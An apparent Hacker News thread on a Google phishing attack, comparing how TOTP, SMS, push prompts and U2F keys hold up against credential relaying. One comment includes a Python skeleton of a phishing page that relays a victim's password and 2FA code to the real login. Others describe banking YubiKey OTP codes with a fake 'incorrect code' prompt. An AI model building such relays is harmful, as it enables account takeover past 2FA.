Two-factor authentication is key here. The YubiKey is the gold standard for business - no one should do serious business without it!
For everyone else, I think the new 2FA Google prompt approach is better. When you go to log in, Google pushes a notification to your phone and you have to tap it. This raises the bar to pulling off a simultaneous login - not impossible, but even if it only weeds out a large number of attacks for now, it's worth it!
If I were going to build a Google phishing page, I would take the username + password that the user supplied to MY fake page and POST/cURL it to the real Google login.
If Google came back asking for a second factor, I would display the 2-factor prompt to the user on my fake page, get them to type the code in, and pass it back to Google.
Basically you can use a phishing page as a MITM attack.
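To make the relay concrete, here's a deliberately skeletal sketch (all endpoints and form fields are hypothetical; a real flow would also have to juggle cookies and CSRF tokens):

```python
# Skeleton of the credential-relaying phishing page described above.
# Endpoints and field names are made up; this only illustrates the MITM flow.
import requests
from flask import Flask, request

app = Flask(__name__)

@app.route("/fake-login", methods=["POST"])
def fake_login():
    # Forward whatever the victim typed straight to the real service.
    upstream = requests.post("https://login.example.com/auth",
                             data={"user": request.form["user"],
                                   "pass": request.form["pass"]})
    if "two-factor" in upstream.text.lower():
        # The real site wants a 2FA code: show the victim a 2FA prompt too,
        # then relay that code the same way.
        return '<form method="post" action="/fake-2fa">Code: <input name="code"></form>'
    return "Signed in."  # the victim is none the wiser
```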
When you auth against Google with 2-factor, there is a "remember this computer" option - giving the attacker at least 30 days of access to your email without needing a further 2-factor code.
So if the person is tricked enough to type their username+password into a fake google page, they are just as likely to follow through with their 2-factor code.
This is where the type of MFA matters a lot: with a TOTP code, that phishing attack will be successful.
With U2F, however, a per-host keypair is generated during the setup process and the public key is given to the remote server. Critically, the hostname as seen by your browser is part of the key identifier: see http://security.stackexchange.com/a/71704/311
That means that even if, in the future, someone convinces you to visit their phishing site and activate the token, the login attempt will still fail, because the hostname as seen by the browser won't match a key on the token.
It depends on which 2FA method you use, and there's an associated time window. With the TOTP method (the Google Authenticator app), the rotating number must be used within a window of at most a few minutes - new numbers are generated every 30 seconds (see the sketch below), so an attacker could use one if they logged in immediately.
If you use U2F, then the domain name difference means the U2F key can never match, unless the attacker controls DNS and is issued a google.com SSL certificate by an authority the target's computer trusts.
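For reference, the rotating TOTP number mentioned above is just RFC 6238: an HMAC-SHA1 over a counter derived from the current time, truncated to six digits. A minimal sketch (the base32 secret here is an illustrative example, not from any real account):

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the current 30-second counter."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval           # rotates every 30 s
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # prints the current 6-digit code for this secret
```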
If a server is making the proxied request, would this still matter? Couldn't the server pretend to be a legitimate browser submission?
In your link they mention replay. But what about a browser you control on the server?
Your browser connects to Google and tells the U2F token to authenticate using the www.google.com key: works.
Your browser connects to www.google.com@phish.me, but no matter whether you believe that site to be Google, the U2F process means it can only use a key for phish.me, which won't work on the google.com servers even if they relay it (see the sketch below).
The only attack which still works is if they control DNS and can forge an SSL certificate, at which point we have much bigger problems than phishing.
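To see why the relay fails, here's roughly how U2F scopes keys (simplified; the real protocol also signs a challenge, a counter, and origin-bearing client data):

```python
import hashlib

# U2F keys are scoped by the SHA-256 of the application id (the origin).
def application_parameter(origin: str) -> bytes:
    return hashlib.sha256(origin.encode()).digest()

registered = application_parameter("https://www.google.com")  # set at enrollment
presented = application_parameter("https://phish.me")         # what the phish hashes to

# The key handle on the token is bound to `registered`; a request carrying
# `presented` selects no key, so there is no signature to relay.
assert registered != presented
```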
> The only attack which still works is if they control DNS and can forge an SSL certificate
Or if they're able to get some malware onto your system permitting them to change your dns servers or alter your hosts file, and add certificates to your OS/browser trust store.
Both of those fall into “control of DNS” or “forging an SSL certificate”. Besides, if they can do either of those things, they don't need to phish you, because they can just hijack your existing browser when you log in to the real site.
Sure, but that's raising the bar a hell of a lot higher than where it is currently, where all you need is an HTML email message that happens to superficially resemble something a random person might expect Google to send.
And in the long run I have more faith in making systems more secure via technological means than in trying to convince users not to click on links in shady email messages. So moving the problem into the technology domain and out of the social domain is, I'd say, a big win.
I have been working on stopping phishing for the last year and have read many malware analysis reports. Domain whitelisting would make things much harder for attackers.
I just announced the beta of a host-based DNS whitelisting app. It trusts the top 10,000 domains; the user has to allow any other domain.
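The core check in such an app can be tiny. A toy sketch (a three-entry set stands in for the real top-10,000 list):

```python
# Allow-list lookup: exact matches and subdomains of allowed domains pass.
ALLOWED = {"google.com", "github.com", "wikipedia.org"}

def is_allowed(hostname: str) -> bool:
    parts = hostname.lower().rstrip(".").split(".")
    return any(".".join(parts[i:]) in ALLOWED for i in range(len(parts)))

assert is_allowed("mail.google.com")
assert not is_allowed("www.google.com.phish.me")  # suffix trickery fails
```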
To be clear, there is no real mutual authentication between the server and the token. The server can authenticate tokens (after first registration), but not the other way around. (You have to go outside the FIDO U2F specification if you want that.) With standard FIDO U2F USB tokens, server authentication is done through SSL at the client application level (most of the time, a web browser).
I'm waiting for the day when I can sign up for 2FA without giving my phone number. At this point, I believe they are withholding that option on purpose, as my phone number is a much more reliable unique identifier than my username and/or cookies.
(Yes, you can use the Google authenticator, but no, you can't do it if you haven't given your phone number first)
Edit: by "they" I mean GMail - other sites work just fine.
To use Google Authenticator you do not need to give out your number. Most sites will show a QR code you scan with your phone, and the Google Authenticator app uses that to generate 2FA codes that are valid within a certain time frame.
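For reference, the QR code usually just encodes an otpauth:// provisioning URI carrying the shared secret, along these lines (illustrative values):

```
otpauth://totp/Example:alice@example.com?secret=JBSWY3DPEHPK3PXP&issuer=Example
```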
You could create a Google Voice account with a free number and link to that. Set it up so calls/sms/etc go nowhere but can be changed if you need to restore your Gmail account later with that number.
How recently have you tried to do so? I tried a couple of months ago to set up a Gmail account with a Google Voice number for verification, and it refused to let me with a message which I recall as being vaguely like "This is not an acceptable verification number".
Well, on a phishing page the user could still type in the username and password before clicking submit. Only after submitting the username and password do authentication layers require the user to interact with their mobile device (which is usually how it works). Some users might forget that they are supposed to 2FA (say, in their first few days on the job).
What if the password input would only be shown after the user typed in their username, pressed submit and confirmed that they were trying to log in using their mobile device?
Adding 2FA does not completely close the exploit window, but it does narrow it considerably. Even if the phishing page prompted for 2FA, those credentials would only be valid for the next ~60-120 seconds (see the sketch below), so any attack would have to be staged very quickly.
In this example, they waited three days before trying to use the compromised account; with 2FA they would not have that luxury.
And asking for 2FA on the phishing page would carry a risk as well: if they prompted a user who did not have 2FA for a 2FA code, that user would immediately be (at best) confused, and possibly suspicious. So the attackers would have to decide whether to risk targeting 2FA'd accounts; and if they don't offer a 2FA prompt, the phishing attempt fizzles, since even with the password they only have one factor.
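The ~60-120 second figure comes from how servers typically validate TOTP: they accept the code for the current 30-second step plus a step or so of clock drift on either side. A self-contained sketch (helper names are mine):

```python
import base64, hashlib, hmac, struct, time

def totp_at(secret_b32: str, step: int, digits: int = 6) -> str:
    # Standard RFC 6238 computation for a given 30-second step.
    key = base64.b32decode(secret_b32, casefold=True)
    digest = hmac.new(key, struct.pack(">Q", step), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

def verify(secret_b32: str, submitted: str, drift: int = 1) -> bool:
    # Accept the current step +/- `drift` steps: a ~90-second live window.
    now = int(time.time()) // 30
    return any(hmac.compare_digest(totp_at(secret_b32, s), submitted)
               for s in range(now - drift, now + drift + 1))
```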
Any sort of re-ordering of the login process by the good guys is only effective if the customer is extremely suspicious of changes in the login process, which nobody will be. The phishing site is under no obligation to match their flow to that of the faked website unless not matching by itself would be suspicious.
Why couldn't the attacker's page pass the 2FA token on to Google immediately and log in as the victim? Then the attacker would have a month or so, not 30 seconds, in which to abuse the account.
That's why I said it narrows the exploit window, and what I meant by "[staging] very quickly". It's a narrower window, and the other objections (like prompting non-2FA users for 2FA) still apply.
If a human has to be involved on the attacker side, then this gets tricky, since they only have a short window where the 2fa is valid. If an automated process is trying to log on, then it is possible that CAPTCHAs would either prevent getting a full interactive session (i.e. just a "read email" level of access, as for an app) or block the attack entirely.
If you are a MITM you don't have to prompt non-2fa users for 2fa. You just replay their credentials, live, on the real site, and if the real site is asking you for 2fa, then you ask the real user for their 2fa.
I think the point here is that, even if you give away your password, the attacker won't be able to access your account, because you're protected by 2FA.
If 2FA was supposed to protect your password from being phished, then it would have to prompt you for your 2FA code every time you log in, which would be pretty annoying.
If you accidentally delete the Google 2FA app, or your phone is stolen or lost, you have to regenerate all the tokens, which can be quite a pain. This happened to me once, and I was lucky I had several 'recovery codes' which I then used to reset the tokens. Personally I would steer clear of a Google-issued 2FA app, as they have more reason to track you and the services you use.
Also, 2FA can sometimes be overkill, especially for accounts that you know will get old and dusty over time (think Yahoo Mail, for example).
Google Authenticator doesn't do any kind of push notification when you log in. Each endpoint uses a shared secret (the server and the mobile app share that secret beforehand) to generate a time-limited code.
I don't think I'd call what Google does 2-factor authentication. Unless I'm missing some option to change this behavior, it's still 1-factor; what changes when you enable it is which factor is the fundamentally required one. With it disabled, you have one factor, the password; anyone who gets it can log on. With it enabled, the password is no longer the single factor, but it is also no longer a required factor at all, because the password-reset mechanism goes through the same phone number used for the 2FA SMS messages. So the phone (or, more specifically, the ability to receive SMS at the saved number) becomes the single factor. For actual 2FA, someone in possession of only one of the two factors shouldn't be able to override the other.
There are obvious reasons Google does it this way, and it is probably a net increase in security, because a phone as a single factor is less often compromised than a password as a single factor. But I don't like calling that particular arrangement 2fa.
There's a phishing-test company that had one of its employees take over a reporter's cell phone account, and it's amazing. She basically plays a crying baby on YouTube and just grabs the account without knowing anything...
2FA using a phone number isn't really 2FA, as you've said. There's a reason this method has been deprecated by NIST and other folks making recommendations about this.
Used correctly, their TOTP app is a real second factor, because it only lives on a single device that you have.
To be precise: Google's hardware 2FA support will work with any security key supporting the FIDO U2F protocol.
Yubikey devices are U2F compatible. (And, in my opinion, among the best devices out there, thanks to PGP/SSH smartcard support.) But there are also cheaper versions on Amazon that work just as well if you're on a budget.
https://tozny.com/ sells a service that enables this for any app, not just Google.
I have a Yubikey and I find it too obnoxious for day-to-day use. I'd rather use an authenticator app (such as Google's or LastPass').
For TOTP on non-Google sites, I find LastPass better than Google's Authenticator. First, LastPass locks the app with a PIN. Second, it can work with the browser extension to fill out those 6-digit codes for you.
Google provides a Chrome extension that alerts you (and an administrator) if you accidentally enter your Google password on a site that isn't accounts.google.com: https://github.com/google/password-alert
Don't forget that the LastPass Chrome extension has been tricked in the past into extracting passwords for arbitrary domains. It's still important to use your brain when clicking links and invoking LastPass's autofill functions.
That's why I love and recommend password managers to all my friends and relatives. Not only do they help prevent phishing, they promote stronger passwords.
Likewise - if Firefox doesn't automatically fill in a password that I expect it to, something strange is going on. (Especially now that Firefox automatically uses HTTP credentials for the same page on HTTPS, which removes the one other common reason for this to happen.)
While I also don't like sites breaking autocomplete, LastPass' "Show matching sites" dropdown only lists accounts valid for the current domain. So a very similar protection is available even without autocomplete.
This article seems great at describing how phishing actually works in practice, especially to people without much exposure to technology. I've gone through at least a couple of training emails from IT departments about phishing, and this was way more effective. A realistic case-study with a really clear description is valuable!
This article could definitely augment the anti-phishing education at your organization—the only downside is that it's a bit long, so busy people probably won't want to read it :/.
Education is key. A great way to do that is with http://phishme.com/, where you can also assess how vulnerable you'd be. The bad thing is that convincing an IT department to use it, and maybe embarrass other people (especially technical ones), is hard.
The beginning of the story is missing. PZ clicked on the link in the email because it was "received [...] from a familiar mailing list".
Did PZ trust a mailing list where anyone could post? Or did the attackers spoof the "from" field? The former may have been prevented by employee training, the latter by SPF or similar technologies.
In my experience, if you use multiple Google accounts you get login prompts all the time: half the time a Google Doc/Drive link requires me to switch to another account, and occasionally I'm asked for password confirmation as well.
Hi, I'm the author of that blog post. The backstory is that, indeed, the "familiar mailing list" had been compromised; the attack was conveyed to us in much the same way as we passed it on to others.
Yeah, it is really good, and I'd like to post it on my FB, but it says nothing about how to protect against phishing, i.e. check the URL. (Even that I'm not so sure about.)
Many people won't check the URL when signing in if everything looks to be on the up and up. This is why I really liked one of the things Yahoo did: the sign-in seal. Every time you signed in, Yahoo would display a custom image that you had set, and if that image wasn't there, something was probably wrong.
I don't think it's gullible for a user to proceed when they see a site missing an image; I think it's naive for an engineer to expect that users will notice, without any actual evidence that they do. It seems like a cardinal sin of engineering - don't assume your users will behave a certain way.
I've run into several websites that use the "security image", and to be honest most of them I don't actually remember what they are until I see them. I can't choose the image myself, so one of them is something banal like a toaster. If I see the toaster, okay, I'm good. But am I 100% certain that if I see a banana instead that I'll say "Something is amiss here!"? I really don't know.
On the other hand, if I could upload my own security image for each site, I guarantee I would remember it, because I'd probably use something I drew myself.
The bank sets a cookie on your machine and only displays the image if you have the cookie. You won't get the image on a machine you've never used to log in before.
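Roughly, the server-side flow looks like this (a minimal sketch with hypothetical names, not any bank's actual code):

```python
from flask import Flask, request

app = Flask(__name__)
SEALS = {"alice": "toaster.png"}  # image chosen by the user at enrollment

@app.route("/login")
def login_page():
    user = request.cookies.get("known_user")  # cookie set after a prior successful login
    seal = SEALS.get(user)
    if seal:
        return f'<img src="/seals/{seal}"> Recognize your seal? Enter your password.'
    # No cookie: first visit from this machine, so no seal is shown.
    return "We don't recognize this device; extra verification required."
```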
Couldn't the hacker just pass on the username (which I assume is being used to select the photo on the real site) and then put that image in place on their fake login site?
But phishers can proxy the third-party site to you, and this isn't hard to do. It might help with your relatives, but for anything even mildly targeted, you can certainly rent a couple of t2.nanos to pull this off...
We also got hit by this a few months back. It got sent to all of our company's contacts; we had to email all of them back, and we lost face.
About an hour in, Google made it so that the emails (even those already received and opened) were blocked, which helped mitigate the issue. Most of the outside contacts who would have received the mail got it in their spam folder.
It seems to me that browsers could be smarter about this kind of thing. Like, "Hey, you just put your Gmail credentials into a non-Gmail login form, did you really mean to do that?"
Obviously in the HN-type crowd, you know to always carefully check the URL of links and form submissions. But I just don't know how realistic it is for that to be expected of an average user.
> Obviously in the HN-type crowd, you know to always carefully check the URL of links and form submissions. But I just don't know how realistic it is for that to be expected of an average user.
How often do you actually check super carefully? I'm pretty sure I'm not as careful as I know I should be. Especially when busy and distracted and thinking about other things.
That would be tough, because most people use one or two email addresses for basically all their accounts. And unless you're storing all their passwords, which would be a sketchy thing to turn on by default, there's no way to tell whether they just put in their Gmail credentials or they really meant to log into gmal.ru. And even if you are storing their passwords, a lot of (most?) people use the same password for lots of different logins. So I don't think there's a way to do this consistently, unless you combine it with a password manager that guarantees the user isn't duplicating passwords across different logins.
Yeah, this specific idea might only work well if you're using a password manager. But it was only an example. It could be something as simple as, "You've never submitted a secure form to this site. Please check the address carefully." If you think it's Gmail, that would be an unexpected alert.
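One way to build that kind of check without storing the password itself (an assumed design, loosely in the spirit of Google's Password Alert, not its actual code): keep only a salted, slow hash captured on the legitimate site, and compare it against what gets typed into password fields on other origins.

```python
import hashlib, hmac, os

SALT = os.urandom(16)

def fingerprint(password: str) -> bytes:
    # Slow, salted hash so the stored value is not a usable copy of the password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

saved = fingerprint("correct horse battery staple")  # captured on accounts.google.com

def reused_elsewhere(typed: str, origin: str) -> bool:
    return (origin != "accounts.google.com"
            and hmac.compare_digest(fingerprint(typed), saved))

assert reused_elsewhere("correct horse battery staple", "gmal.ru")
```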
Google needs to add some optional intelligence to Chrome so that when it comes across a site whose design is suspiciously similar to key Google URLs, but which sits on an unrecognized URL, it warns the user.
Don't those screenshots just show domains crafted deceptively to look like Google domains? I don't see any legitimate Google ones.
> “We are approaching the point in this case where there are only two reasons for why people say there’s no good evidence,” Rid told me. “The first reason is because they don’t understand the evidence—because they don’t have the necessary technical knowledge. The second reason is they don’t want to understand the evidence.”
Is there anywhere we can see this evidence? Objectively, I'm curious how an attack consisting of basic phishing was determined to be definitively supported by the Russian government.
If they had broken SHA-256 or coerced a Russian CA into issuing a Google certificate, I'd agree... but using bitly and decades-old "click this link to reset your password" links? Come on.
Notice in one of the last screenshots that the link actually points to a real google.com domain, but to an /amp/ destination under which a tiny.cc link was hidden; the fetched content therefore "seemed like" it came from Google when Google was merely acting as a CDN.
I recently saw a link, which I unfortunately can't find, where someone senior affiliated with DEF CON or Black Hat nearly got phished. He was rushing to pack for a trip to some conference, in the midst of a flurry of Amazon shipments, and got a very well-timed phishing email asking him to confirm shipment details for Amazon. He fortunately noticed it named the wrong product, but as I remember it, he had already started typing his info.
If someone like that can get nearly fooled, there's little hope for the rest of us or our families.
It's time to give up on preventing phishing and start working on amelioration.
ps -- if anybody knows the story I'm talking about, I'd love the link.
Only if you use a U2F hardware token. 2FA using SMS or a smartphone app merely raises the bar for phishing: the attacker can forward the password along to the real service, prompt the user for the 2FA code, forward that along too, and then get a session cookie which they can use to access the account later.
One key difference that made me appreciate the thought which went into U2F: people using password managers can still copy and paste the real password into a phishing form, which they're somewhat trained to do by all of the large websites that don't have (or don't have working) single sign-on.
With U2F that failure mode is impossible since you cannot get the private key to shoot yourself in the foot with, even if the phisher successfully convinces you to try.
You know when your U2F device has been stolen because it's not in your possession anymore. The hardware is meant to be at least tamper-evident, if not tamper-resistant, so an attacker can't just steal the internal secret and put the device back where they found it.
Bytes in a password manager are hard to steal, but if you do steal them, the legitimate owner won't necessarily ever know.
The phisher can just relay your token to establish a login from their end and still have access to your account. In this article, the attacker created a filter to move all incoming messages to Trash (that doesn't require a token), then deleted the contacts (I don't think that requires a token either), and kept an active connection to the inbox (also doesn't require a token).
I have a USB token that's just a simulated keyboard, it doesn't do anything fancy like checking which URL I'm on. So, perhaps some do that, but definitely not all.
Yep. This same phishing attack reached our office a few months back - it was a good motivating force for the whole office to enable 2FA. Probably an overall net positive for the company :)
At my company we get these things 2-3 times a year.
Surprisingly many people realize that there is something fishy. But "surprisingly many" is not enough.
2FA is not enough here: a user who doesn't have the knowledge to tell what is phishing and what is not will most likely enter the 2FA key too, giving the bad guys the auth tokens anyway.
At my workplace we hire a company to do occasional phishing attacks on employees. If you get got (I have been got) you are briefly made to feel foolish and have to do a training course. They release stats and like you I was surprised how few people fall for it. But people always fall for it. I think this forced exposure to phishing attacks is an excellent idea.
Newer Yubikeys support U2F, which I haven't seen any way to phish yet, but the Yubikey OTP protocol can still be phished.
To do this, the fake login page claims the token was incorrect the first time (which might alert some people, but certainly not everyone), and when the user submits a second token, the phishing site sends the first one to the real site. The attackers now hold an unused token, which remains valid until the user next logs into a website with the key (thus invalidating the banked one).
> What makes an attack like this so effective is that you never expect to see something as convincing as this
I've been working on phishing and counter-phishing recently, and if someone is actually putting in any effort, you have to expect something like this: a very legitimate-looking email, the correct signature (complete with up-to-date font/logo), and a virtually perfect copy of the login page for whatever service they're using. All of this, even just to target a single person, is under 8 hours of work - which is to say, it's a simple task for someone who really wants to phish you.
The article mentions having an IDS and disaster recovery plans, and that's the best you can hope for, as pretty much everyone is susceptible to this, and even AI-based detection can still be beaten.
Then you may be able to answer this question: is it really a problem that those people accessed the link but didn't log in? Sure, you could put malware on the page, but that's possible on any website.
Yes, but in theory some sort of MAC could stop malware from accessing important files, or antivirus could detect and stop it. Once the password leaves the computer, though, it takes a lot more effort to mitigate the damage. Also, your browser is on your side in protecting against malware; for example, if you have Flash disabled, that's a whole vector you can just ignore.
OK, this article is great and I'd like to share it with all my friends. BUT it says nothing about how to protect against phishing, and so it would leave the average internet user just vaguely paranoid, which is not helpful.
I'd like to contact the author and get him to append something about "check the url". But I guess they are not advertising their email addresses anymore :-)
This just shows that password-based authentication doesn't work for normal people (i.e., not computer engineers) and needs to be replaced with physical cryptographic keys. This is a script-kiddie-level attack any teenager could pull off, and it succeeded.
It's surprising that a dedicated phisher would go so blatantly overboard, knowing it would stick out like a sore thumb. This wasn't spearphishing; it was regular phishing in a pond.
In my vision of the future, most devices will not have a default gateway.
Instead, everything will be forced through application layer proxy servers which inspect the traffic and decide whether to let it pass. This would include domain whitelisting, as you mentioned, content filtering and inspection, and/or anything else the {company,"protection service",user} wanted to add.
I have no doubt that eventually, someday, we will live in a world where our electronic devices default to deny.
It's worth noting that the new show-the-user's-image-before-password-input flow for Google sign-in is an anti-phishing feature. Of course, most people won't think that deeply when prompted with a password request and a similar UI.
Then how does the image consistently display before the password has been provided? No matter what the answer is, I don't see how it could be an anti-phishing feature.
I use fresh incognito tabs constantly. So I guess I'll never see the image, and never know something is amiss.
But I also never click an email link to log in unless it's a plain-text password reset. I receive authentic-looking and topical Dropbox share requests from actual contacts (who have been hacked) trying to phish my Dropbox credentials maybe 4-5 times a year, so I'm always on the lookout for it. This is a classic attack. Always check the URL!
It's partially because you can sign in with custom domains. By putting your email address in first, Google can figure out what signin mechanism to use prior to you inputting your password (or not, if you don't need one).
For example, we use Google Apps at work with our custom domain, with an internal SSO server providing authentication services. You enter your email address, the Google page directs you to the internal SSO server, you get a token, take that back to Google, and you get logged in - no password required.
When you first go to a Google sign-on, it asks for your email. Once you input your email, it then shows you the profile picture corresponding to the account, and asks you to input the password. If the account has no profile picture, the icon is blue instead of gray. (Tested in Incognito mode)
That's not correct. If you sign on from an unrecognized computer, it doesn't show your photo. Using incognito mode doesn't make you "unrecognized;" you need to have a different IP.
I had never heard of SQRL before, so I just spent some time researching it. From what I can find, it has some significant flaws[0], and it doesn't seem these can be addressed without defeating the few advantages the SQRL approach has.